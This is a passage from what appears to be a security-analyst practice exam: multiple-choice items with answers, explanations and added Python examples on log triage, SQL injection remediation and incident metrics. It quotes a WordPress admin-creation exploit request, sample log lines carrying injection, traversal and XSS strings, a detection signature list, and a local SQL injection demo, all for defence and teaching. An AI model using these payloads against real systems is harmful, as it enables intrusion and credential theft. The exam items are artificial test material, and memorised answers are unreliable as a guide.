Benefits:
Centralized View: All threat data is accessible in one place, making it easier to correlate and prioritize incidents.
Reduced Complexity: No need to manage multiple interfaces or logins.
Improved Decision-Making: Analysts can quickly identify patterns and respond to threats more effectively.
Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?
A. MITRE ATT&CK
B. Cyber Kill Chain
C. OWASP
D. STIX/TAXII
Correct Answer: A
A security analyst would most likely use MITRE ATT&CK for comparing Tactics, Techniques, and Procedures (TTPs) between different known adversaries of an organization.
MITRE is the organization that developed this framework. The acronym ATT&CK stands for Adversarial Tactics, Techniques & Common Knowledge, which reflects the focus of the framework: understanding adversary behavior.
MITRE ATT&CK is a comprehensive framework that provides a detailed matrix of adversary behaviors across various stages of the attack lifecycle. It helps analysts understand and compare the techniques used by threat actors, aiding in threat intelligence, incident response, and vulnerability management.
An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?
A. Eradication
B. Recovery
C. Containment
D. Preparation
Correct Answer: A
The step that describes the analyst actively removing the vulnerability from the system is A. Eradication.
During this phase, the focus is on completely eliminating the threat or vulnerability to prevent it from causing further harm. Once eradication is complete, the system can move toward recovery and restoration.
Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer’s customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?
A. Isolate Joe’s PC from the network
B. Reimage the PC based on standard operating procedures
C. Initiate a remote wipe of Joe’s PC using mobile device management
D. Perform no action until HR or legal counsel advises on next steps
Correct Answer: D
Legal Considerations: Joe’s actions may have legal implications, especially if he’s soliciting customers while still employed. It’s essential to consult with legal counsel to determine the appropriate course of action.
HR Involvement: HR should be informed promptly. They can guide the organization on how to handle the situation, including any necessary disciplinary actions or termination procedures.
Preserving Evidence: Isolating Joe’s PC or wiping it remotely could inadvertently destroy evidence that might be relevant in any future legal proceedings. It’s best to wait for professional advice.
Incident response should always be coordinated with legal and HR departments to ensure compliance and protect the organization’s interests.
The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?
A. Reduce the administrator and privileged access accounts
B. Employ a network-based IDS
C. Conduct thorough incident response
D. Enable SSO to enterprise applications
Correct Answer: A
These accounts often have elevated permissions and are attractive targets for attackers. By minimizing their numbers and ensuring strict access controls, organizations can significantly enhance security.
While the other options are important, they may not directly address the attack surface reduction as effectively as limiting privileged accounts.
For instance:
Employing a network-based IDS (Option B) helps detect and respond to network-based attacks, but it doesn’t directly reduce the attack surface.
Conducting thorough incident response (Option C) is crucial, but it’s reactive rather than preventive.
Enabling SSO to enterprise applications (Option D) improves user experience but doesn’t inherently reduce the attack surface.
During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?
A. Clone the virtual server for forensic analysis
B. Log in to the affected server and begin analysis of the logs
C. Restore from the last known-good backup to confirm there was no loss of connectivity
D. Shut down the affected server immediately
Correct Answer: A
Creating a clone of the affected server ensures that the original system remains untouched during the investigation. The cloned server can be analyzed for evidence without risking further damage or data loss. This step aligns with the preservation phase of incident response, where maintaining the integrity of potential evidence is crucial.
A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?
A. C2 beaconing activity
B. Data exfiltration
C. Anomalous activity on unexpected ports
D. Network host IP address scanning
E. A rogue network device
Correct Answer: A
Considering the information provided, the most likely explanation is C2 beaconing activity (A). Regular outgoing HTTPS connections to a single public IP address that continue on a fixed cadence regardless of working hours are the signature of a beacon, so the next step is to confirm the cause and check the server for compromised software or malware.
C2 Beaconing Activity (A): Command-and-control (C2) beaconing involves periodic communication from an infected host to a remote server controlled by an attacker. An implant checks in on its schedule whether or not anyone is using the server, which is why the same pattern appears around the clock, after hours and during work hours alike.
Data Exfiltration (B): Data exfiltration involves unauthorized transfer of sensitive information from an internal network to an external location. While this could be a possibility, the continuous traffic pattern both during and after work hours doesn’t align with typical exfiltration behavior.
Anomalous Activity on Unexpected Ports (C): This option refers to unusual traffic on non-standard ports. While it’s essential to investigate further, the fact that the traffic occurs consistently during work hours makes it less likely to be an anomaly.
Network Host IP Address Scanning (D): Scanning activity involves probing other hosts or networks for vulnerabilities. However, if the server is initiating these connections, it’s less likely to be scanning other hosts. Scanning activity is usually inbound, not outbound.
A Rogue Network Device (E): A rogue network device, such as an unauthorized router or switch, could cause unexpected traffic patterns. However, this explanation seems less probable given the consistent behavior during work hours.
New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?
A. Human resources must email a copy of a user agreement to all new employees
B. Supervisors must get verbal confirmation from new employees indicating they have read the user agreement
C. All new employees must take a test about the company security policy during the onboarding process
D. All new employees must sign a user agreement to acknowledge the company security policy
Correct Answer: D
Given the situation, the SOC manager would likely recommend option D: All new employees must sign a user agreement to acknowledge the company security policy.
User Agreement: Having new employees sign a user agreement explicitly acknowledges their awareness of company policies. This creates a formal record and ensures accountability.
Verbal Confirmation (Option B): Relying solely on verbal confirmation may not be sufficient, as it lacks a documented record. Verbal agreements can be easily forgotten or misunderstood.
Emailing a Copy (Option A): While sending an email with the policy is helpful, it doesn’t guarantee that employees will read and understand it thoroughly.
Taking a Test (Option C): While testing knowledge is valuable, it might be time-consuming and may not be practical during the onboarding process.
By having new employees sign a user agreement, the organization establishes a clear understanding of the policy and ensures compliance. Additionally, periodic reminders and training sessions can reinforce policy awareness.
An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign?
A. Information sharing organization
B. Blogs/forums
C. Cybersecurity incident response team
D. Deep/dark web
Correct Answer: A
Given the critical nature of the company’s supply chain and the potential impact of a ransomware attack, the best threat intelligence source to learn about this new campaign would be information sharing organizations.
These organizations aggregate and disseminate timely threat intelligence, often collaborating with industry experts, government agencies, and other security professionals.
An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned?
A. To satisfy regulatory requirements for incident reporting
B. To hold other departments accountable
C. To identify areas of improvement in the incident response process
D. To highlight the notable practices of the organization’s incident response team
Correct Answer: C
The most likely reason to include lessons learned in an after-action report is C. To identify areas of improvement in the incident response process. By analyzing what went well and what could be improved during the incident response, organizations can enhance their security posture, refine their processes, and better prepare for future incidents.
While satisfying regulatory requirements (option A) is important, the primary focus of lessons learned is on process improvement rather than compliance.
Holding other departments accountable (option B) and highlighting notable practices (option D) are secondary considerations compared to learning from the incident to prevent recurrence.
A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?
A. Hacktivist
B. Advanced persistent threat
C. Insider threat
D. Script kiddie
Correct Answer: C
The user in this scenario has become a C. Insider threat. An insider threat refers to someone within an organization who misuses their access or privileges to intentionally or unintentionally cause harm to the organization’s security, data, or systems. In this case, the user’s actions of downloading and spreading malware would fall under the category of insider threat.
During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?
A. Disk contents
B. Backup data
C. Temporary files
D. Running processes
Correct Answer: D
When collecting evidence during an incident, the order of volatility is crucial. Analysts should prioritize running processes first, as they are the most volatile and can change rapidly. After that, they can proceed to collect other data such as temporary files, disk contents, and backup data. So the correct answer is D. Running processes.
An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?
A. Take a snapshot of the compromised server and verify its integrity
B. Restore the affected server to remove any malware
C. Contact the appropriate government agency to investigate
D. Research the malware strain to perform attribution
Correct Answer: A
Given the situation, the CSIRT should prioritize the following actions:
Take a snapshot of the compromised server and verify its integrity (Option A): Creating a snapshot allows for forensic analysis without altering the original state. Verifying integrity ensures that the snapshot accurately represents the compromised system.
Research the malware strain to perform attribution (Option D): Understanding the malware helps identify the threat actor, their motives, and potential impact. This information informs incident response and future prevention measures.
Restore the affected server (Option B): After analysis, if the server is deemed safe, restoring it ensures business continuity. However, this step should follow snapshot creation and integrity verification.
Contacting government agencies (Option C): While important for certain incidents (e.g., nation-state attacks), it’s not the immediate next step. Focus on technical investigation first.
Remember, confidentiality and thorough analysis are critical. Availability can be restored later once security is assured.
A security analyst is writing a shell script to identify IP addresses from the same country.
Which of the following functions would help the analyst achieve the objective?
A. function w() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $info" }
B. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo "$1 | $info" }
D. function z() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }
Correct Answer: B
To identify IP addresses from the same country, the most relevant function is B. function x(). Let’s break down why:
Function w() uses ping to measure round-trip time to a host, but it doesn’t provide country information.
Function y() performs a reverse DNS lookup (dig -x) and extracts the PTR record, but this doesn’t directly give country details.
Function z() traces the route to a host, but it doesn’t focus on country information.
Now, let’s look at Function x():
function x() {
info=$(geoiplookup $1)
echo "$1 | $info"
}
This function uses the geoiplookup command, which queries a GeoIP database to determine the country associated with an IP address. It’s the most suitable choice for your objective.
A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region.
Which of the following shell script functions could help achieve the goal?
A. function w() { a=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $a" }
B. function x() { b=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }
C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short }
D. function z() { c=$(geoiplookup $1) && echo "$1 | $c" }
Correct Answer: C
The shell script function that could help identify possible network addresses from different source networks belonging to the same company and region is function y. Here’s how it works:
function y() {
dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short
}
This function takes an IP address as an argument and performs two DNS lookups using the dig command. It retrieves information related to the address, including its origin and Autonomous System Number (ASN). The output provides valuable context for identifying network addresses within the same company and region.
While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?
A. Shut the network down immediately and call the next person in the chain of command.
B. Determine what attack the odd characters are indicative of.
C. Utilize the correct attack framework and determine what the incident response will consist of.
D. Notify the local law enforcement for incident response.
Correct Answer: B
Shutting down the network immediately might be an overreaction at this point. Investigate further before taking such drastic action.
Utilizing the correct attack framework (Option C) is a good approach, but first, you need to identify the type of attack.
Notifying local law enforcement (Option D) is premature. Law enforcement typically gets involved after a thorough assessment.
Focus on analyzing the odd characters in the request line. Look for patterns, research known attack techniques, and consider using threat intelligence sources to identify the specific attack. Once you have more information, proceed with incident response accordingly.
A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?
A. Service-level agreement
B. Change management plan
C. Incident response plan
D. Memorandum of understanding
Correct Answer: C
The security team should create an Incident Response Plan (IRP) to address this issue. An IRP outlines the procedures, roles, and responsibilities for handling security incidents. It ensures a coordinated and effective response, including identifying who should take specific actions during and after an incident. The IRP helps streamline decision-making and ensures that the right individuals are involved in the next steps.
A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?
A. Geoblock the offending source country.
B. Block the IP range of the scans at the network firewall.
C. Perform a historical trend analysis and look for similar scanning activity.
D. Block the specific IP address of the scans at the network firewall.
Correct Answer: B
Given the situation, the best mitigation technique would be B. Block the IP range of the scans at the network firewall.
Geoblocking (option A) might seem like a straightforward solution, but it can have unintended consequences. Blocking an entire country could inadvertently affect legitimate traffic or hinder business operations if there are any legitimate connections from that country.
Blocking the specific IP address (option D) is reactive and may not prevent other scanners from using different IP addresses. It’s better to address the broader range of IPs involved in the scanning activity.
Performing historical trend analysis (option C) is valuable for understanding the context and identifying patterns, but it won’t immediately stop the ongoing scanning activity.
Blocking the IP range of the scans at the network firewall (option B) is a targeted approach. By doing so, you can prevent further scanning attempts from that specific range without affecting other legitimate traffic.
Remember that timely incident response and continuous monitoring are crucial in cybersecurity. Regularly reviewing logs, analyzing threat intelligence, and staying informed about emerging threats will help you proactively address security incidents.
An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:
/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator
Which of the following controls would work best to mitigate the attack represented by this snippet?
A. Limit user creation to administrators only.
B. Limit layout creation to administrators only.
C. Set the directory trx_addons to read only for all users.
D. Set the directory V2 to read only for all users.
Correct Answer: A
The snippet provided appears to be an attempt to exploit a WordPress vulnerability.
The /wp-json/trx_addons/V2/get/sc_layout part indicates an endpoint in the WordPress REST API.
The sc=wp_insert_user&role=administrator query parameters suggest an attempt to create a new user with the “administrator” role.
A. Limit user creation to administrators only:
This control directly counters what the request is trying to do: create a new user with the administrator role through a plugin endpoint that does not enforce authorization. Even if the vulnerable endpoint cannot be patched immediately, requiring administrator privileges for every user-creation path (and alerting on newly created administrator accounts) defeats the attack's objective. This is the best answer.
B. Limit layout creation to administrators only:
The sc_layout endpoint is the vector, but the payload is user creation, not layout creation. Restricting layouts does not stop the privilege escalation.
C. Set the directory trx_addons to read-only for all users:
File-system permissions on the plugin directory do not affect an HTTP request to code that is already installed; the plugin's PHP executes whether or not its files are writable. Making the directory read-only would also break legitimate plugin updates.
D. Set the directory V2 to read-only for all users:
The same objection applies. V2 is just a path segment of the REST route, and write permissions on it play no role in how the request is handled.
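As an added example (not code from the original page), the following Python script parses combined-format web server log lines, URL-decodes the request line so that the "odd characters" from the log-review question become readable, and classifies each request against a few signature patterns, including the trx_addons user-creation call from the question above. The log format, the sample entries and the signature list are assumptions made for the example; real logs need the regex adjusted and the ruleset is far larger in practice.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined log format (Apache/nginx). The layout is an assumption for this example;
# adjust the regex for other formats.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# Constructed sample entries: a burst of requests sharing one timestamp, as in the
# log-review question, plus the trx_addons REST call from the WordPress question.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:02:14:05 +0000] "GET /index.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2024:02:14:05 +0000] "GET /index.php?id=1%20UNION%20SELECT%20user,pass%20FROM%20users HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2024:02:14:05 +0000] "GET /download?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 403 221
203.0.113.7 - - [10/Mar/2024:02:14:05 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 1024
198.51.100.4 - - [10/Mar/2024:02:14:06 +0000] "GET /wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator HTTP/1.1" 200 77
192.0.2.10 - - [10/Mar/2024:02:15:00 +0000] "GET /about.html HTTP/1.1" 200 3311
"""

# (label, pattern applied to the URL-decoded request path). Deliberately small.
SIGNATURES = [
    ("sqli", re.compile(r"('\s*(or|and)\s*'|\bunion\b.*\bselect\b|;\s*drop\b)", re.I)),
    ("path_traversal", re.compile(r"(\.\./|\.\.\\|/etc/(passwd|shadow))", re.I)),
    ("xss", re.compile(r"(<script|javascript:|vbscript:|onerror\s*=)", re.I)),
    ("privileged_rest_call", re.compile(r"wp_insert_user|role=administrator", re.I)),
]


def decode_path(path):
    """Decode percent-encoding twice so double-encoded payloads become visible too."""
    return unquote(unquote(path))


def classify(path):
    """Return the signature labels that match the decoded request path."""
    decoded = decode_path(path)
    return [label for label, rx in SIGNATURES if rx.search(decoded)]


def analyze(log_text):
    """Parse log lines; return {ip: {timestamp: [(decoded_path, labels)]}} for flagged requests."""
    findings = defaultdict(lambda: defaultdict(list))
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        labels = classify(m["path"])
        if labels:
            findings[m["ip"]][m["ts"]].append((decode_path(m["path"]), labels))
    return findings


def burst_sources(findings, min_hits=3):
    """Sources that fired several flagged requests within one second: almost certainly a tool."""
    return {ip for ip, by_ts in findings.items() if any(len(v) >= min_hits for v in by_ts.values())}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip, by_ts in result.items():
        for ts, hits in by_ts.items():
            for path, labels in hits:
                print(f"{ip} [{ts}] {labels}: {path}")
    print("automated sources:", burst_sources(result))
```

The decoded path is what you compare against signatures and threat intelligence; the burst detection is what turns "several entries with the same time stamp" into a concrete statement that a scanner or exploit kit was run against the site.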
A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?
A. Implementing multifactor authentication on the server OS
B. Hashing user passwords on the web application
C. Performing input validation before allowing submission
D. Segmenting the network between the users and the web server
Correct Answer: C
* Input Validation: Ensuring that user input is validated on the server before it is processed is the remediation that addresses the finding. The penetration tester retrieved credentials by submitting crafted data to a form, which is the signature of an injection flaw; validating the input rejects the payload before it reaches the database or interpreter. Common techniques include:
* Allowlisting (whitelisting): accepting only the characters, length and patterns a field legitimately needs (e.g., alphanumeric characters for a username). This is the preferred approach.
* Denylisting (blacklisting): explicitly rejecting known malicious inputs (e.g., SQL injection strings). It is weaker, because attackers find encodings the list does not cover.
* Regular Expressions (Regex): using patterns to enforce a field's format (e.g., email addresses, phone numbers).
Validation must happen on the server; client-side checks are trivially bypassed. For database-backed forms, parameterized queries (prepared statements) should accompany validation, since they prevent SQL injection regardless of what the validator accepts.
Hashing User Passwords: Hashing is essential, but it does not address the vulnerability. It ensures that an attacker who obtains the password database does not see plaintext passwords; it does nothing to stop the form from being abused in the first place, and credentials retrieved through the flaw may come from elsewhere than the password column.
Multifactor Authentication (MFA): MFA limits what a stolen password is worth by requiring additional proof of identity (e.g., a one-time code), and MFA on the server OS in particular has nothing to do with the web form. It does not fix the application vulnerability.
Network Segmentation: Segmenting the network between users and the web server is good practice for overall security, but the users are the web server's legitimate clients; the malicious form submission travels the same path as every normal request.
In summary, input validation prevents malicious data from being processed, making it the most relevant recommendation in this context.
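The following is an added example, not code from the page, showing the flaw and the fix side by side in Python against an in-memory SQLite database: the vulnerable lookup concatenates the form value into the SQL statement, while the hardened lookup allowlist-validates the value and then binds it as a query parameter. The table layout, the sample rows and the username rules are assumptions.

```python
import re
import sqlite3

# Allowlist: the characters and length a username may legitimately have (assumed policy).
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{3,32}")


def valid_username(value):
    """Server-side allowlist check. Anything outside the pattern is rejected outright."""
    return isinstance(value, str) and USERNAME_RE.fullmatch(value) is not None


def setup_db():
    """Constructed schema and rows so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "$2b$12$hashA"), ("bob", "$2b$12$hashB")])
    return conn


def lookup_vulnerable(conn, username):
    """The defect the pen tester exploited: the form value is spliced into the SQL text."""
    query = f"SELECT username, password_hash FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def lookup_hardened(conn, username):
    """Validate first, then bind the value as a parameter so it can never become SQL."""
    if not valid_username(username):
        raise ValueError("rejected input")
    return conn.execute(
        "SELECT username, password_hash FROM users WHERE username = ?", (username,)
    ).fetchall()


if __name__ == "__main__":
    db = setup_db()
    payload = "' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, payload))   # every row comes back
    try:
        lookup_hardened(db, payload)
    except ValueError as err:
        print("hardened:", err)
    print("hardened, valid input:", lookup_hardened(db, "alice"))
```

Input validation is the answer the question asks for, and it blocks the payload before it reaches the database. The parameter binding in lookup_hardened is the control that makes SQL injection impossible regardless of what the validator accepts; keep both.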
A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?
A. Mean time between failures
B. Mean time to detect
C. Mean time to remediate
D. Mean time to contain
Correct Answer: D
Mean Time to Contain (MTTC) measures the average time it takes to isolate and control a security incident after its initial detection. It focuses on the critical period between detection and containment, which directly impacts the spread of malware within the network.
Mean Time to Detect (MTTD), on the other hand, measures the average time it takes to identify a security incident. While important, MTTD alone doesn’t account for the containment effort.
Mean Time to Remediate (MTTR) measures the average time it takes to fully remediate an incident after detection. While relevant, it doesn’t specifically address containment speed.
Therefore, including MTTC in the executive briefs provides a clear indicator of the organization’s ability to swiftly contain and mitigate security incidents, minimizing their impact on critical systems.
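An added example (not from the page) of computing the three metrics from incident records in Python, which makes the measurement windows explicit: MTTD runs from the estimated time of compromise to detection, MTTC from detection to containment, and MTTR from detection to full remediation. The records, their timestamps and the field names are constructed assumptions about what a ticketing system exports.

```python
from datetime import datetime
from statistics import mean

# Constructed incident records (UTC). Field names are an assumption for this example.
INCIDENTS = [
    {"id": "INC-1", "occurred": "2024-03-01T08:00", "detected": "2024-03-01T09:30",
     "contained": "2024-03-01T10:00", "remediated": "2024-03-02T08:00"},
    {"id": "INC-2", "occurred": "2024-03-05T14:00", "detected": "2024-03-05T14:20",
     "contained": "2024-03-05T16:20", "remediated": "2024-03-06T14:20"},
    {"id": "INC-3", "occurred": "2024-03-09T01:00", "detected": "2024-03-09T03:00",
     "contained": "2024-03-09T03:30", "remediated": None},   # still open: excluded from MTTR
]


def hours_between(start, end):
    return (datetime.fromisoformat(end) - datetime.fromisoformat(start)).total_seconds() / 3600


def mean_time(incidents, start_field, end_field):
    """Average hours from start_field to end_field over incidents that have reached end_field."""
    spans = [hours_between(i[start_field], i[end_field])
             for i in incidents if i.get(start_field) and i.get(end_field)]
    return round(mean(spans), 2) if spans else None


def incident_metrics(incidents):
    """Each metric is defined by the window it measures, so the field pairs are the definition."""
    return {
        "MTTD_hours": mean_time(incidents, "occurred", "detected"),    # compromise -> detection
        "MTTC_hours": mean_time(incidents, "detected", "contained"),   # detection -> spread stopped
        "MTTR_hours": mean_time(incidents, "detected", "remediated"),  # detection -> fully fixed
    }


if __name__ == "__main__":
    for name, value in incident_metrics(INCIDENTS).items():
        print(f"{name}: {value}")
```

MTTC_hours is the number the executives asked for; note that it depends on the quality of the "contained" timestamp, so the response team has to record when containment was actually achieved, not when the ticket was updated.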
An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has:
- created the initial evidence log.
- disabled the wireless adapter on the device.
- interviewed the employee, who was unable to identify the website that was accessed.
- reviewed the web proxy traffic logs.
Which of the following should the analyst do to remediate the infected device?
A. Update the system firmware and reimage the hardware.
B. Install an additional malware scanner that will send email alerts to the analyst.
C. Configure the system to use a proxy server for Internet access.
D. Delete the user profile and restore data from backup.
Correct Answer: A
Given the options, the correct remediation is A. Update the system firmware and reimage the hardware. Invasive malware can persist in places that a profile deletion or a second scanner never touches (services, scheduled tasks, boot components and, in some cases, firmware), so the reliable way to return the device to a trusted state is to update the firmware and rebuild it from a known-good image. The other options are not remediation: an additional scanner that emails alerts (B) only detects; the device is already behind a proxy, since the analyst reviewed the proxy logs (C), and a proxy does not clean an infected host; deleting the user profile and restoring data (D) leaves system-level persistence in place.
The steps already taken fit the standard sequence for an infected endpoint:
Isolate the Device: Remove the endpoint's network access to prevent lateral movement. Disabling the wireless adapter does this only if the device has no wired or cellular connection, so confirm that before moving on.
Identify the Type, Scope, and Timeline of the Malware Infection: The proxy logs and the employee interview establish what was downloaded, from where and when, and whether other hosts contacted the same destination.
Create an Image of the Infected System: Before reimaging, capture a forensic image if evidence must be preserved for analysis or legal purposes; reimaging destroys it.
Remove the Malware: For invasive malware, prefer reimaging over in-place cleaning; a scanner may remove the visible components and miss the persistence mechanism.
Reset Credentials and Invalidate Sessions: Assume any credential used on the device was captured. Change the employee's passwords, revoke tokens and invalidate active sessions.
Review Access to Impacted Applications: Check what the device and the employee's accounts could reach, review those systems for signs of follow-on activity, and close the entry point (here, block the malicious site at the proxy).
A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?
A. High GPU utilization
B. Bandwidth consumption
C. Unauthorized changes
D. Unusual traffic spikes
Correct Answer: A
The indicator that points most directly at cryptomining is A. High GPU utilization. Mining workloads saturate whatever compute the attacker can obtain, and in a cloud environment the auto-provisioned resources are typically GPU-backed instances because they mine far more efficiently than CPUs. Sustained, abnormally high GPU (or CPU) utilization on newly created resources, together with unexpected compute charges, is the characteristic sign of cryptojacking. Bandwidth consumption (B) and unusual traffic spikes (D) are not typical of mining, which needs only a low-volume connection to the mining pool; unauthorized changes (C) are what triggered the alert, not evidence of what the resources are being used for.
A company’s security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?
A. Help desk
B. Law enforcement
C. Legal department
D. Board member
Correct Answer: C
Legal Implications: The legal department is responsible for ensuring that the company complies with all relevant laws, regulations, and policies. Inappropriate use of resources can have legal implications, and the legal team can provide guidance on how to handle such situations within the bounds of the law.
Policy Enforcement: The legal department plays a crucial role in enforcing company policies. They can advise on the appropriate steps to take, including any disciplinary actions or legal consequences.
Risk Mitigation: Escalating the issue to the legal department helps mitigate risks associated with inappropriate resource use. They can assess the severity of the incident, evaluate potential liabilities, and recommend appropriate actions.
While the help desk, law enforcement, and board members may be involved at later stages, the legal department should be the initial point of escalation to ensure compliance with legal requirements and company policies. Keep in mind that industry best practices may vary, but involving legal experts early on is generally advisable.
Given the following CVSS string:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Which of the following attributes correctly describes this vulnerability?
A. A user is required to exploit this vulnerability.
B. The vulnerability is network based.
C. The vulnerability does not affect confidentiality.
D. The complexity to exploit the vulnerability is high.
Correct Answer: B
The CVSS string provided corresponds to a vulnerability with the following attributes:
Base Score: 9.8 (Critical severity)
Attack Vector (AV): Network (AV:N)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): None (PR:N)
User Interaction (UI): None (UI:N)
Scope (S): Unchanged (S:U)
Confidentiality Impact ©: High (C:H)
Integrity Impact (I): High (I:H)
Availability Impact (A): High (A:H)
B. The vulnerability is network based.
Option A is incorrect: Privileges Required (PR): None (PR:N)
Option C is incorrect: Confidentiality Impact (C): High (C:H)
Option D is incorrect: Attack Complexity (AC): Low (AC:L)
Which of the following best describes the goal of a tabletop exercise?
A. To test possible incident scenarios and how to react properly
B. To perform attack exercises to check response effectiveness
C. To understand existing threat actors and how to replicate their techniques
D. To check the effectiveness of the business continuity plan
Correct Answer: A
The goal of a tabletop exercise is A. To test possible incident scenarios and how to react properly. These exercises simulate various security incidents, allowing participants to discuss and practice their response strategies, identify gaps, and improve incident handling procedures. They are valuable for enhancing preparedness and coordination within an organization.
A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on the device is not modified?
A. Generate a hash value and make a backup image.
B. Encrypt the device to ensure confidentiality of the data.
C. Protect the device with a complex password.
D. Perform a memory scan dump to collect residual data
Correct Answer: A
Hash Value and Backup Image:
* Generating a hash value of the original drive creates a fingerprint of its entire content that can be re-checked at any time. SHA-256 is the current recommendation; MD5 and SHA-1 are no longer collision-resistant, although forensic tools often still record them alongside SHA-256 because older reports and procedures reference them.
* Making a backup image (also known as a forensic image) involves creating a bit-for-bit copy of the hard drive. This image can be used for analysis without altering the original data.
* The hash value of the original drive and the backup image should match if no modifications occur during the preservation process.
Other Options:
B. Encrypt the device: Encryption ensures confidentiality but doesn’t prevent modification.
C. Protect with a complex password: A password protects access but doesn’t prevent data alteration.
D. Perform a memory scan dump: This collects volatile memory data, not the entire hard drive content.
A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?
A. The server was configured to use SSL to securely transmit data.
B. The server was supporting weak TLS protocols for client connections.
C. The malware infected all the web servers in the pool.
D. The digital certificate on the web server was self-signed.
Correct Answer: D
A. The server was configured to use SSL to securely transmit data.
Transport encryption (TLS, still commonly called SSL) does not by itself trigger a warning. The browser's trust decision is based on the certificate the server presents, not on the fact that the connection is encrypted.
B. The server was supporting weak TLS protocols for client connections.
Weak protocol versions (TLS 1.0 and 1.1) are a genuine weakness and current browsers refuse them outright, but that produces a connection error rather than the "site cannot be trusted" message users are describing.
C. The malware infected all the web servers in the pool.
If the whole pool were infected, the complaints would not have started only after one server was rebuilt and returned to the pool. Nothing in the scenario supports this.
D. The digital certificate on the web server was self-signed.
This is the most likely cause. When the server was rebuilt, the CA-issued certificate and its private key were evidently not restored, leaving the web server with a self-signed certificate. Self-signed certificates are not issued by a certificate authority the browser trusts, so every client that lands on that pool member receives a trust warning, which matches the intermittent "site cannot be trusted" reports. A quick check is to connect to the rebuilt server directly (for example with openssl s_client -connect host:443) and compare the certificate issuer with that of the other pool members.
